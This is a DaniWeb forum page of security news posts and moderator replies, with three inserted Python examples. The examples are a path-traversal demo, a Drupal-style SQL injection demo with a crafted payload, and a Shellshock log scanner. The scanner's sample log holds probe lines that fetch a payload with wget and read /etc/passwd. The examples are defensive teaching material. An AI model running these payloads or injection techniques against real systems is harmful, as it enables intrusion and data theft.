happygeek 2,411 Most Valuable Poster Team Colleague Featured Poster

Welcome Scott. You'll be fed up with all my welcomes, what with PM and in forum now :)

happygeek

Google has been quick to blacklist domains implicated, most often unwittingly, in the distribution of what has become known as the SoakSoak malware campaign, courtesy of soaksoak.ru being the first domain in the redirection path it used. With 11,000 domains blocked over the weekend, you might be forgiven for thinking that it's another WordPress site security problem sorted before it can do any harm. However, most experts I have spoken to would seem to agree that 11,000 domains is just the tip of this particular iceberg and that the actual number of SoakSoak impacts on WordPress-specific sites is in the hundreds of thousands.


According to security outfit Sucuri, which has been leading the analysis of this outbreak, it would appear that the attack vector can be traced back to the RevSlider plugin vulnerability that Sucuri disclosed some months back now. Unfortunately, as is the way with such things, many WordPress site operators do not seem to have addressed the issue and continue to use the premium plugin. This isn't surprising given, as Sucuri points out, "it’s not something everyone can easily upgrade and that in itself becomes a disaster for website owner". What's more, the plugin is bundled with themes and so some owners won't even know they have it.

Whatever, the supersoaker effect is quite clear: this is a local file inclusion attack methodology, which means that a remote attacker can download any local file they fancy from the target server. …
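The post only says the RevSlider hole is a local file inclusion that lets a remote attacker pull arbitrary files off the server. The following is an added example, not code from the original post and not the plugin's or Sucuri's code: it reproduces that bug class in a stand-alone image-serving handler, with a vulnerable version beside a hardened one. The function names, the temporary directory layout and the stand-in `wp-config.php` contents are all constructed for the demo.

```python
"""Path traversal / local file inclusion: vulnerable vs hardened file serving.

Added example, not from the original post or from the RevSlider plugin. The
post only says the flaw lets a remote attacker fetch any file on the server;
this shows that bug class in a generic handler. Names such as
serve_file_vulnerable and the sample files are constructed for the demo.
"""
import os
import tempfile
from pathlib import Path

ALLOWED_SUFFIXES = {".png", ".jpg", ".jpeg", ".gif"}


def serve_file_vulnerable(base_dir: str, requested: str) -> bytes:
    """Trusts the client-supplied name: joins it under base_dir and reads it.

    os.path.join walks '..' segments (and drops base_dir entirely if
    `requested` is absolute), so '../../wp-config.php' escapes the image folder.
    """
    path = os.path.join(base_dir, requested)
    with open(path, "rb") as fh:
        return fh.read()


def serve_file_hardened(base_dir: str, requested: str) -> bytes:
    """Resolves the final path and refuses anything outside base_dir.

    Checks, in order: the extension is on the allowlist, the resolved path
    (symlinks followed) is still inside the resolved base directory, and the
    target is a regular file. Any failure raises PermissionError.
    """
    base = Path(base_dir).resolve()
    # Resolve *before* checking: '..' segments and symlinks are collapsed here.
    target = (base / requested).resolve()
    if target.suffix.lower() not in ALLOWED_SUFFIXES:
        raise PermissionError(f"extension not allowed: {target.suffix!r}")
    if base != target and base not in target.parents:
        raise PermissionError(f"path escapes base directory: {requested!r}")
    if not target.is_file():
        raise PermissionError(f"not a regular file: {requested!r}")
    return target.read_bytes()


def demo() -> dict:
    """Builds a throwaway tree and runs both handlers against a traversal."""
    root = tempfile.mkdtemp()
    images = Path(root) / "uploads" / "images"
    images.mkdir(parents=True)
    (images / "logo.png").write_bytes(b"PNGDATA")
    secret = Path(root) / "wp-config.php"  # constructed stand-in for a secret
    secret.write_bytes(b"DB_PASSWORD=hunter2")

    traversal = "../../wp-config.php"
    results = {
        "vulnerable_leaks_secret":
            serve_file_vulnerable(str(images), traversal) == b"DB_PASSWORD=hunter2",
        "hardened_serves_legit":
            serve_file_hardened(str(images), "logo.png") == b"PNGDATA",
    }
    try:
        serve_file_hardened(str(images), traversal)
        results["hardened_blocks_traversal"] = False
    except PermissionError:
        results["hardened_blocks_traversal"] = True
    return results


if __name__ == "__main__":
    print(demo())
```

The order of the checks matters: resolving first and comparing against the resolved base is what defeats `..` and symlink tricks; the extension allowlist on its own would still let `../../secret.png` through, and a naive `startswith` on the unresolved string would not.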

happygeek

I prefer forums, some people prefer the old mailing list approach. DaniWeb offers both options, you chose the wrong one :)

happygeek

An increasing number of my acquaintances seem to be in the habit of buying cheap Android smartphones when in China on business and, increasingly, from online auction sites. More often than not these will be clones of flagship models but without the flagship price tag; however, cheap is not always cheerful. I've seen some of these devices with their look-alike operating systems and their flimsy construction, and given a quick once over have to say I wouldn't trust them with my calls, texts and data. That level of mistrust appears to be well founded, not least because it would seem that some of these cheap clone phones are coming pre-loaded with malware called DeathRing.

According to mobile security outfit Lookout this is the second time this year that an outbreak of DeathRing has been spotted. The Chinese Trojan, Lookout says, is coming pre-installed on a whole bunch of cheap Chinese phones which are most popular in the Asian and African regions. The company does admit, it has to be said, that the volume when it comes to DeathRing detection is 'moderate' although it doesn't give any actual numbers. Lookout does insist that active detections are being picked up globally though, which makes the threat both viable and concerning.

DeathRing, as the name suggests, pretends to be a pre-loaded ringtone app but in actual fact is a malware conduit for content downloaded from a central command and control server. SMS content can be pushed to the handset, for …

happygeek

A group describing itself as "DDoS kings" who "just want to watch the world burn" has claimed responsibility for taking the Microsoft Xbox Live network down for an hour or two earlier today. The Lizard Squad, posting from a Twitter account called LizardPatrol, published a message warning that "Microsoft will receive a wonderful Christmas present from us" and say that taking Xbox Live offline was "a small dose of what's to come on Christmas."


The downtime impacted users of both the Xbox 360 and Xbox One, returning an 80151909 error when trying to connect to Xbox Live. According to Microsoft support, this error code occurs when "Xbox Live profiles can't be downloaded" and indicates a temporary profile download failure. Seeing as there were no issues being reported on the official Microsoft site regarding the Xbox Live network, which is usually the case, it would suggest that a DDoS attack could have been the cause.

At the time of writing Xbox Live appears to be back up and functioning normally once more. Whether this was, indeed, a DDoS attack and if it is indicative of more to come is as yet unknown. If it does prove to be the case then the fact that the group claiming responsibility says it is doing it for kicks is a little worrying. Of course, it could just as easily be a group of bored kids jumping on an entirely unrelated downtime event for the kudos. Only …

happygeek

What is Google and what is it used for?

happygeek

The annual 'Black Friday' discounted shopping storm is no longer just an American event; it's hit the UK like a hurricane today. Last night police were called to four different supermarkets with heavily discounted televisions after large crowds started to gather for the midnight opening. At one Asda store (a Walmart owned UK supermarket chain) there was fighting as shoppers opted to get physical in order to secure that electrical bargain.

Then, both the Tesco supermarket and Currys PC World electrical superstore websites buckled under the pressure of would-be shoppers keen to get an online bargain. Next it was clothing retailer Topshop, and this morning the website of high street video game retailer 'Game' was down and out due to "the overwhelming response to our Black Friday offerings" apparently.


Of course, truth be told, the reason why these online sites were unavailable is a lot simpler. They underestimated the demand, and they under-budgeted for the resources required to keep their servers up. It's still only mid-morning here in the UK and I can confidently predict that more retail websites will be going down as Black Friday continues; and most likely into the Cyber Monday discount shopping continuation as well.

Archie Roboostoff, Borland Solutions Portfolio Director at Micro Focus, reckons that research points towards some 44 per cent of CIOs being well aware of the precise events that drive such peak-traffic loads, yet relatively few perform any kind of performance load testing in advance of them. …

happygeek

Ever wondered why the bad guys continue throwing malware in your direction? The obvious answer is the correct one: because they make money from doing it. On Thanksgiving Day, as on all other days across the year it would seem, they can be thankful for the high profit to be raked in from using readily available malware purchased within the dark market.

Kaspersky Lab researchers have been doing the math, and their figures suggest that when comparing the cost of the most common hacker tools with the cold cash stolen using them, the profit is around 20 times greater than the outlay. By way of example, setting up an out-of-the-box social network clone together with a spam mailing list linking victims to it would cost as little as $150 according to the researchers; with just 100 targets getting caught, the phishing perpetrators could expect a return of up to $10,000 on average.

Or how about a mobile Trojan which 'bricks' a smartphone until a ransom is paid? These are rather more expensive to purchase, about $1000 in fact. However, with unlocking 'fees' set at $200 (and victims are generally happy to pay to get back access to their photos, music and contacts which have not been backed up separately - let alone the problem of resetting a device for the kind of naive, technically speaking, user caught by such malware) it only takes 100 victims to realise a $20,000 return.

However, the Kaspersky research would seem to …

happygeek

You can look to see who is replying and determine whether they are to be trusted, in exactly the same way you do when interacting with anyone in the real world. Just as you would trust your professor to give an accurate answer (probably) and maybe not so much the drunk chap on the street corner (depending upon the question of course) so you will probably trust a developer on DaniWeb who has a high reputation and has been helping others for a long period more than you would a newbie with no rep called 'lovepotionsforsale' and a sig link pointing to a site selling witchdoctor services...

happygeek

Think that macro viruses written in VBA (Visual Basic for Applications) are just something that people using the Internet a couple of decades ago had to worry about? Think again. Word macro attacks never went away, they just went into decline. New evidence suggests they could be making something of a comeback though. Coupled with research showing how non-English speaking recipients are being targeted by phishers using this technique, it makes for worrying reading some 15 years after Melissa struck fear into the email using world.

Whenever I hear non-English and phishing uttered in the same breath, I tend to think the speaker is talking about the scammer rather than the attack message itself. The number of emails that appear in my spam and malware filtered folders which have patently obviously come from the keyboard of a non-English speaker far outweighs those that have not. However, the language of phishing itself has pretty much always been English for one very good reason: it represents the largest attack surface for the least effort. Of course, there are always exceptions, and targeted attacks (also known as spear phishing) are more likely to be crafted in whatever language is thought to be spoken by the recipient based upon the location of that target mark. One thing is for sure: most security researchers will agree that malicious URLs in email tend to be a lot more prolific in English-speaking recipient countries than elsewhere.

Which doesn't mean you are safe if, for …

Stuugie commented: Interesting and thanks for sharing. +6
happygeek

Use the search box top right, or scroll through recent forum posts, or use Google and you will find your answer...

Closing this thread now before it turns into a sigspam fest.

happygeek

Fingers, if not legs, crossed for you ;)

stultuske commented: yup :) +0
happygeek

Why are you asking when you are a web developer/design outfit which offers SEO services according to the page you link to in your sig? Surely you would know this stuff already, if not why would anyone hire you?

happygeek

Viruses have not been much of a problem for years now. Malware and increasingly privilege escalation attacks, on the other hand, have.

happygeek

As the title says, I'm just bigging myself up here but am stoked to have won the award for 'Best Investigative Feature of the Year' at the BT Information Security Journalism Awards in London yesterday. I'm particularly pleased as I beat off competition from BBC News, The Guardian and The Telegraph. That's the 8th year straight I have been shortlisted at the event, and the 8th award I've picked up there over the years since it started in 2006. Sadly it wasn't for something published on DaniWeb (although I have won the same award in the past for a news story which I broke here) but rather an InfoSecurity Magazine investigation into the value of vulnerability data.

Back to reality today, with a bunch of deadlines to meet...

pritaeas commented: Congrats! +0
mike_2000_17 commented: Congrats +0
happygeek

You might be forgiven for thinking that the iPhone is the most secure of the smartphone choices, especially if you've opted for a 5S or above with that fingerprint reader for secure ID and iOS 8 as the most robust of operating systems. Forgiven, but wrong; despite the claims from Apple that iOS is designed with advanced security technologies built in rather than bolted on. If you go by the results of the annual PWN2OWN hacking competition which was held in Tokyo last week, then iOS fell behind Android and, to add to the jaw-dropping amongst many pundits, Android in turn fell behind Windows Phone, which proved the hardest-to-hack platform of all.

It's not been the best of months for Apple as far as iOS security reputation goes. First, security researchers disclosed the Masque Attack, which has the potential to leave business users at risk. Essentially, this means that apps distributed using enterprise provisioning profiles are not subject to the normal Apple security review process roadblocks, and malicious apps can be installed over the top of (and replacing) genuine ones if they share the same bundle identifier. Apple has rather waved this off as a non-event, but if you read the FireEye disclosure report you will see that the company claims to be aware of in-the-wild attacks taking place.

And then came the Mobile PWN2OWN 2014 results, with a South Korean team managing to pwn the iPhone 5S by …

happygeek

Depends if your site has links to or is involved with 'illegal' TV/movie content I would imagine. Otherwise, nothing much to see here...

happygeek

What is the difference between a real question and a pointless post?

happygeek

Sigh, didn't take long for that new account to be banned.

Making threats of getting your friends to take down DaniWeb is another sign of your immaturity.

happygeek

Probably a bit late now, don't you think, as that was from NINE MONTHS ago...

happygeek

Blimey, the 'Top SEO Company in India' doesn't know how to Google. Whatever next...

happygeek

Quick reminder of the rules:

Do not ask for help to pursue any illegal activity including, but not limited to, hacking and spamming

happygeek

The UK's National Crime Agency (NCA) has said that it has dealt a "major blow to dark web markets." In a statement issued on the 7th November the NCA says that a coordinated operation between law enforcement agencies in Europe and the US has "targeted market places for illegal commodities on the dark web" and as part of this six people in the UK were arrested.

Amongst those arrested in strikes closely coordinated with international partners in the US were the suspected administrators of Silk Road 2.0, the Tor-accessed drugs and firearms market place. The NCA statement also claims that "significant vendors of illegal drugs through the dark web" were also arrested and that "technical infrastructure which is key to the hosting of illegal market places on the dark web" was taken down.

So what will the impact of this operation be? That's hard to say, not least because it has been a commonly held belief that Silk Road 2.0 was compromised from the get go following the takedown of the original Silk Road site and arrest of alleged owner Ross William Ulbricht who is said to have been the infamous Dread Pirate Roberts. At the time I said that "it would be a brave, or foolhardy, person who started trading in illegal goods using it" and that prediction appears to have been accurate.

Mind you, according to a report by security investigative journalist Brian Krebs it seems that plenty of dealers were …

happygeek

American technology companies are by implication evil, and aiding terrorist groups such as Islamic State/ISIS according to a number of highly influential but terribly ill-informed Western players. Apple and Google have become the command and control networks of choice for terrorists and implementing full-device encryption by default will help Islamic State to plan future attacks, if we are to believe certain spy masters and career politicians.

I use the term 'terribly ill-informed' wisely, and am aware that I will no doubt get plenty of flak from those who think the head of the UK Government Communications Headquarters (GCHQ) or the Director of the FBI may just be better informed than myself when it comes to terrorist activity. However, I will stick to my guns and explain why I'm taking the stance that I am here.

But first let's examine what's been said and by whom. It kicked off with James B. Comey, Director of the Federal Bureau of Investigation, who said in a speech last month that "those charged with protecting our people aren't always able to access the evidence we need to prosecute crime and prevent terrorism even with lawful authority." Comey spoke of having the legal authority to intercept and access communications and data, but often not the technical ability to do so. Excuse me for saying you could have fooled me, given the Snowden revelations and all that has followed regarding how security agencies are throwing money at technology programs for cracking …

happygeek

So, today is 'World Paper Free Day' apparently and I'm not sure whether it's appropriate to buy a card in the circumstances. Joking aside, what I am sure of is that such Hallmark days do provide an opportunity for press releases to be thrown in my general direction. And so it was that yesterday one pops into my inbox proclaiming "Paper revealed as the top threat to information security." What rot! Before even reading a word of the release itself I knew that it was going to be rubbish that, if it were on paper, I would screw into a ball and with an athletic flounce chuck into the bin. I was not wrong, and here's why.

"Paper the top threat to information security say two-thirds of UK firms. Iron Mountain/PwC study reveals just 15 per cent have a team focused specifically on paper protection" screams the strapline. "The handling of paper documents is the single greatest threat to the protection of information, according to a recent study by storage and information management company Iron Mountain and PwC launched ahead of World Paper Free Day on November 6th" it continues, before informing me that 66 per cent of mid-sized companies regard the management of information on paper as a serious security risk, and that's more than double the number that fear external threats to digital content such as hacking and malware.

Can you spot the two big problems there? The first is obvious, and that is this …

happygeek

EPoX went out of business a couple of years back so you cannot approach them, and a quick search of the usual suspects such as MOBOT has not returned anything other than a spec sheet here.

Sorry, looks like you are out of luck unless you can find a fellow owner who still has access to a manual.

Alternatively, what problems are you having that you need the manual to help with? It may be that DaniWeb members can help without the specific manual being required.

happygeek

Sorry Jack, but you are too young to use DaniWeb in that case. So your account will be closed. Feel free to reapply when you are 13.

Minimum Age Requirement

In compliance with the U.S. COPPA Act, no one under the age of thirteen (13) is permitted to register on these forums. If someone under the age of 13 does register, it is understood that they are doing so against DaniWeb's policies and without DaniWeb's knowledge.

happygeek

Jack, probably best not to rant about spelling and then type "how do you secure you're network" when it should be "your network" don't you think? ;-)

happygeek

Although based in New York, DaniWeb is very much a global community. I'm from England, for example, and our moderator Diafol (who will be well known to anyone who has ever browsed the PHP forum) is a Welshman through and through. I mention this as last week I went on a tour of IT security and military tech companies as the guest of the Welsh Government, who were keen to demonstrate how South Wales in particular has become something of a cyber-security cluster in the UK.

My trip was centred in Cardiff, best known to sci-fi geeks the world over as home to Doctor Who. The BBC has been filming there since the series returned to television in 2005, and the city is also where you can find the Doctor Who Experience exhibition until at least 2017. However, Cardiff is the Welsh capital and also sits at the lively beating heart of an IT Security hub in South Wales. The Welsh Government have made it very clear that the intention is to attract security start-ups and established players alike as part of a broader technology business strategy in the country. This aim can be extended beyond the entrepreneurial basics though; there's a will here to make South Wales one of the most secure places in the world to do business, through the building of cyber security skills and resources.

Cardiff is in the final stages of getting an Internet Exchange, one of only a …

happygeek

<rubberman> Cain & Abel is a password cracking tool.

<Muhammad68> What was the point of that?

<chalobe.lefa> Please take note of the rules, especially the one that states: "Do not ask for help to pursue any illegal activity including, but not limited to, hacking and spamming" - please clarify your question bearing this rule very carefully in mind.

happygeek

What?

Let me rephrase that: WHAT?

happygeek

Probably because it's not compatible with Windows 7, see: http://answers.microsoft.com/en-us/windows/forum/windows_7-hardware/how-do-i-install-a-hp-laserjet-1010-printer-using/4fbb4816-3ffb-4b49-897e-c800d0a0a9e0

which also includes a workaround.

I assume you have contacted/searched HP for a Windows 7 driver in case one is now available?

happygeek

A Drupal security advisory, SA-CORE-2014-005, rather embarrassingly states that:

Drupal 7 includes a database abstraction API to ensure that queries executed against the database are sanitized to prevent SQL injection attacks. A vulnerability in this API allows an attacker to send specially crafted requests resulting in arbitrary SQL execution. Depending on the content of the requests this can lead to privilege escalation, arbitrary PHP execution, or other attacks. This vulnerability can be exploited by anonymous users.

I think that's a whoops, with an uppercase W. The highly critical SQL injection vulnerability is to be found in versions of Drupal 7 prior to 7.32 and users should immediately upgrade to 7.32 to fix the problem. The urgency for updating is confirmed by the fact that proof of concept sharing has been spotted on assorted dark web forums and there is at least one known live exploit out there.

Dwayne Melancon, CTO at Tripwire, told me that "the ever-increasing use of Open Source and third-party software components means this isn’t the last time we will see this kind of vulnerability – diligence is critical, and this is as much a supply chain issue as it is a technical one. This situation shares similarities with other recently discovered exploits such as ShellShock, Heartbleed, and the Poodle SSL vulnerability in that it is something that has been around for quite a while but just wasn’t known. Exploits, such as this one, that enable arbitrary command execution by unauthenticated remote users …
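The advisory quoted above says only that the Drupal 7 database abstraction API can be made to run arbitrary SQL from a crafted request. The following is an added illustration, not Drupal's code and not from the post: it reproduces the shape of that flaw as it was later documented publicly, namely that when a query argument was an array the API expanded it into one placeholder per element and derived the placeholder names from the array's keys, which a web client controls because PHP turns `name[...]=x` in a request into an array key. It is assumed here that SQLite stands in for MySQL (so the constructed payload is a filter bypass rather than the stacked `UPDATE` used in the wild), and the table, column and function names are all constructed for the demo.

```python
"""Placeholder expansion built from attacker-controlled array keys.

Added illustration of the SA-CORE-2014-005 bug class; not Drupal's code.
The vulnerable expander names placeholders after the keys of a dict that
came straight from the request; the hardened one uses positional indices.
SQLite (not MySQL) is used, and the payload/table are constructed for the demo.
"""
import re
import sqlite3

_SAFE_NAME = re.compile(r"^[A-Za-z0-9_]+$")


def expand_arguments_vulnerable(query: str, args: dict) -> tuple:
    """Expands dict-valued args into :key_<k> placeholders using the dict's own keys."""
    out = dict(args)
    for key, data in args.items():
        if not isinstance(data, dict):
            continue
        new_keys = {f"{key}_{k}": v for k, v in data.items()}  # k is untrusted input
        placeholders = ", ".join(":" + k for k in new_keys)
        query = re.sub(rf":{re.escape(key)}\b", lambda _m: placeholders, query)
        del out[key]
        out.update(new_keys)
    return query, out


def expand_arguments_hardened(query: str, args: dict) -> tuple:
    """Same expansion, but placeholder names come from enumerate(), never from input."""
    out = dict(args)
    for key, data in args.items():
        if not isinstance(data, dict):
            continue
        if not _SAFE_NAME.match(key):
            raise ValueError(f"bad placeholder name {key!r}")
        new_keys = {f"{key}_{i}": v for i, v in enumerate(data.values())}
        placeholders = ", ".join(":" + k for k in new_keys)
        query = re.sub(rf":{re.escape(key)}\b", lambda _m: placeholders, query)
        del out[key]
        out.update(new_keys)
    return query, out


def _db() -> sqlite3.Connection:
    """Constructed users table: one blocked account, two active ones."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, status INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", 0), ("bob", 1), ("alice", 1)])
    return conn


QUERY = "SELECT name FROM users WHERE name IN (:name) AND status = 1"

# Constructed malicious form submission, as PHP would parse it:
#   name[0) OR 1=1 --]=x&name[0]=bob
# The first key becomes part of a placeholder *name* and so lands in the SQL
# unquoted; the second key supplies a value for the :name_0 the comment leaves behind.
MALICIOUS = {"0) OR 1=1 --": "x", "0": "bob"}


def run(expander, name_param: dict) -> list:
    """Expands QUERY with the given strategy and returns the matching names."""
    conn = _db()
    query, args = expander(QUERY, {"name": name_param})
    return [row[0] for row in conn.execute(query, args)]


if __name__ == "__main__":
    print("vulnerable:", run(expand_arguments_vulnerable, MALICIOUS))
    print("hardened:  ", run(expand_arguments_hardened, MALICIOUS))
```

With the vulnerable expander the query becomes `... WHERE name IN (:name_0) OR 1=1 --, :name_0) AND status = 1`, so the status filter is commented away and the blocked `admin` row comes back with everyone else; the hardened expander produces `IN (:name_0, :name_1)` and the attacker's key text never reaches the SQL string. The lesson generalises past Drupal: anything that builds identifiers, placeholder names or column lists from request data is an injection point, however carefully the values themselves are bound.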

happygeek

Actually, Dropbox was not hacked, and the majority of the logins posted so far either are not related to Dropbox or are from inactive accounts. Looks like yet another case of someone posting a database of stolen credentials that were being reused by people across sites and services, and the 'hacker' was trying all the major players to see if anything hit. Dropbox states it had already reset passwords on all accounts it had identified as being at potential risk from this particular non-exploit.

happygeek

Done :)

kidkardel commented: hi, tnx +0
happygeek

So, Microsoft and iSIGHT uncovered another 0-day vulnerability; this time impacting all supported versions of Microsoft Windows and Windows Server 2008 and 2012. iSIGHT has detailed in-the-wild exploits of the vulnerability, and points the finger of suspicion at state-sponsored Russian interests. The Dallas-based cybersecurity outfit explained that the exploit (dubbed Sandworm) showed visibility targeting Ukrainian government organisations, Polish energy businesses and US academic organisations as well as NATO itself, and warned that there is an obvious potential for much broader targeting from the same and new threat actors.

The researchers have been tracking at least five distinct Russia-based intrusion teams, one of which was based around mobile malware use and targeted US and European intelligence communities as well as jihadists and rebels in Chechnya. The Sandworm Team, however, has been active through late 2013 and throughout 2014 targeting victims with specific lures related to the Ukrainian conflict via 'traditional' spear phishing techniques involving malware-infected document attachments. The newly observed Microsoft Windows 0-day is the latest weapon to be deployed.

iSIGHT has seen evidence of the group attacking NATO with other exploits during December 2013, and more recently with spear-phishing attacks during the NATO summit on Ukraine held in Wales. In September it spotted that the spear-phishing attacks were reliant upon exploitation of this new 0-day vulnerability, which impacted all supported versions of Microsoft Windows (from Vista SP2 to Windows 8.1) and Windows Server 2008 and 2012, weaponised with an infected PowerPoint document. …

happygeek

In what article? You are posting a lot of nonsense all over the place, please cease and desist...

happygeek

HINT: we don't do your homework for you.

HINT: show us your code, explain what you are stuck with, and we will take it from there...

happygeek

Number four sums it up. Also applies to posting stuff on DaniWeb you don't want your teacher/employer/wife to see...

happygeek

My worst fears confirmed. We will miss you Mel. The world of programming will miss you Mel. One of the most helpful and knowledgeable guys ever to have blessed DaniWeb with his presence.

:'-(

happygeek

At the start of the year, DaniWeb reported how Snapchat, the self-destruct photo messaging service, had been hacked and information regarding 4.5 million users had been stolen. Fast forward to now, and Snapchat is again in the mire: nude images have started to appear on 4chan which have been stolen from Snapchat accounts.

According to new reports, images from 200,000 Snapchat accounts have been stolen and are now starting to appear online. Snapchat itself denies that its own servers have been breached; however, it does confirm that accounts have been hacked. This rather confusing admission would appear to be due to Snapchat account holders using third-party apps to send and receive their photos, something that Snapchat prohibits in the terms of use because of the security risk. Indeed, Snapchat has been successful in having such apps removed from Google Play and the App Store, but inevitably there are plenty out there and plenty in use.

In case you have not come across Snapchat before, it's basically an application driven service which enables users to post images, video and text on a time limited basis to a group of recipient users. These 'snaps' self-destruct, sort of, after 10 seconds. That is, there is a 10 second window during which the recipient can see them after which they are no longer available for viewing. Unless the recipient saves it using a screengrabber, or uses a different app to access the service, and so on. The fact that …

happygeek

Did you not read the reply, which gives the information you seek, before posting? Or are you just replying to everything regardless and not actually bothering to read the conversation first? At the moment, it certainly seems like the latter.

Sometimes less is more...

happygeek

Do you have any deadlines written into the contract/agreement that you have with her? If you are concerned with the time being taken then chase her up, after all you are paying her for a service here...

happygeek

Useful information about the evolution of Shellshock attack payloads to be found here:

http://research.zscaler.com/2014/10/bashed-evolution-of-shellshock-attack.html

happygeek

As well as being CEO of penetration testing specialists High-Tech Bridge, Ilia Kolochenko is also perhaps unsurprisingly a white hat hacker of some repute. Equally unsurprising is the fact that he has warned that security vulnerabilities in leading CMS platforms such as Drupal, Joomla and WordPress are effectively leaving the security door wide open for hackers to walk through.

Kolochenko refers to the threat posed by old plugins, passwords and extensions as being the 'Achilles heel of popular CMS' and for good reason. High-Tech Bridge regularly tests popular CMSs via the ImmuniWeb online penetration testing service and equally regularly, sadly, discovers vulnerabilities therein. It follows a strategy of responsible disclosure, which I'm all in favour of, whereby any vulnerabilities are reported to the vendor with immediate effect but no public disclosure (other than a broad statement without exploitable details) is made for three weeks. This gives the vendor ample time to do something about it, and should encourage those who are a bit slow off the mark to focus attention on a fix. All without alerting the bad guys as to how to create code to exploit the hole.

This is obviously a good thing for all of us, with many Joomla and WordPress vulnerabilities coming to light this way, and being patched before any damage can be done. Unfortunately, black as well as white hat hackers do the research and it's always something of an ongoing race to find the holes first. The difference being that the …

happygeek

It's a hark back to the past.

Ten is the number of people who liked Windows Me, and Microsoft is aiming on bettering that after Vista and 8 failed to make it.

Reverend Jim commented: Hah! +0
Dani commented: I was one of the 10 who liked Me. +0
happygeek

The news that JPMorgan Chase & Co, which is the largest of the US banks with a reach that extends to half of all American households, has been breached will surprise nobody. At least not in the sense that this is old news, with a disclosure of the event happening in August. The actual breach was discovered by the bank back in July, and is thought to have been active for at least a month prior to that. What is surprising, however, is that a financial organisation of such a size and reputation should fall victim to such a breach in the first place. One highly placed individual in the IT security business told me over a pint that "if it can happen to JP Morgan then, frankly, it can happen to anyone" and that wasn't just the drink talking. Also surprising was the claim that a million accounts had been compromised during the breach, a claim made during the initial disclosure.

Just before the weekend the surprise level went off the scale as the New York-based bank revealed, via a regulatory filing, that the actual numbers were a little higher. How much higher? How does 76 million households and 7 million small businesses higher strike you? Of course, this can be played down by comparing it to other mega-breach statistics: the Target attack last year hit 110 million accounts, and the more recent eBay hack 145 million. That doesn't make the JP Morgan numbers any the less striking though, …

happygeek

Get a virtual divorce?

mouaadable commented: damn so funny +1
happygeek

More news from the security research labs:

FireEye has discovered that cyber attackers have already mobilised to use the BASH Shellshock bug and suspects that they may be conducting initial dry runs in preparation for a real, potentially larger scale, attack. Some of the suspicious activity appears to be originating from Russia, although there has been frenzied activity from all over the world. It’s believed that it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise. So far, the Common Gateway Interface vector (an interface between a web server and executables that produce dynamic content) has received the bulk of the focus from attackers; however, the reach of the BASH Shellshock bug doesn’t stop at web servers. Any application that relies on user-controlled data to set OS-level environment variables and then invokes the shell from that same context can trigger the vulnerability. In other words, web applications relying on a specific type of user input can be manipulated to make clients (i.e., consumers) vulnerable to attack.
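The CGI vector described above works because a web server copies request headers such as User-Agent and Referer into environment variables before running the script, and a vulnerable bash executes whatever follows a function export (`() { ... };`) in any variable it imports. The following is an added example, not FireEye's tooling and not from the original post: it scans access-log lines for that function-export marker in the header fields CGI exposes, and separately runs the well-known environment-variable check against the local bash. It assumes the Apache/nginx "combined" log format; the four log lines are constructed, and the IPs and URLs in them are documentation addresses, not real probes.

```python
"""Shellshock probe detection over web-server access logs, plus a local bash check.

Added example, not FireEye's tooling and not from the post. Assumes Apache
"combined" log format; SAMPLE_LOG is constructed (documentation IPs only).
A probe carries the bash function-export prefix "() {" in a header that CGI
copies into an environment variable, which is the vector the text describes.
"""
import re
import shutil
import subprocess
from typing import Optional

# combined format: ip ident user [time] "request" status bytes "referer" "agent"
_COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# Function-export marker; the real exploit strings vary after it, so match only this.
_SHELLSHOCK = re.compile(r"\(\)\s*\{")

SAMPLE_LOG = """\
203.0.113.9 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://198.51.100.7/x -O /tmp/x'"
198.51.100.23 - - [25/Sep/2014:10:01:07 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [25/Sep/2014:10:01:11 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 196 "() { :; }; echo; /bin/cat /etc/passwd" "curl/7.37.0"
192.0.2.77 - - [25/Sep/2014:10:02:30 +0000] "POST /login HTTP/1.1" 302 0 "-" "() { :;}; ping -c 3 198.51.100.7"
"""


def find_shellshock_probes(log_text: str) -> list:
    """Returns (ip, field, payload) for every header value carrying a function export."""
    hits = []
    for line in log_text.splitlines():
        m = _COMBINED.match(line)
        if not m:
            continue  # unparsable line; in production count these rather than drop silently
        for field in ("agent", "referer", "request"):
            value = m.group(field)
            if _SHELLSHOCK.search(value):
                hits.append((m.group("ip"), field, value))
    return hits


def local_bash_vulnerable() -> Optional[bool]:
    """Runs the classic env-variable check against the local bash; None if bash is absent.

    A vulnerable bash parses the exported "function" in x and goes on to execute
    the trailing command, so "vulnerable" appears in stdout; a patched one stops
    at the function definition and prints only "probe".
    """
    bash = shutil.which("bash")
    if bash is None:
        return None
    proc = subprocess.run(
        [bash, "-c", "echo probe"],
        env={"x": "() { :;}; echo vulnerable", "PATH": "/usr/bin:/bin"},
        capture_output=True, text=True, timeout=10,
    )
    return "vulnerable" in proc.stdout


if __name__ == "__main__":
    for ip, field, payload in find_shellshock_probes(SAMPLE_LOG):
        print(f"{ip} via {field}: {payload}")
    print("local bash vulnerable:", local_bash_vulnerable())
```

Matching only on the `() {` prefix rather than on particular payloads is deliberate: the post-exploitation commands changed daily during the outbreak, while the prefix is what the bash parser keys on and so cannot be dropped by an attacker. The 404 on the constructed third line is a reminder that a blocked or missing CGI target still logs the probe, and that the originating address is worth tracking across requests.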

happygeek

15 mins. ROFL...

Nobody here is going to do your homework for you buddy. Tell us exactly what you are stuck with and someone might be able to point you in the right direction.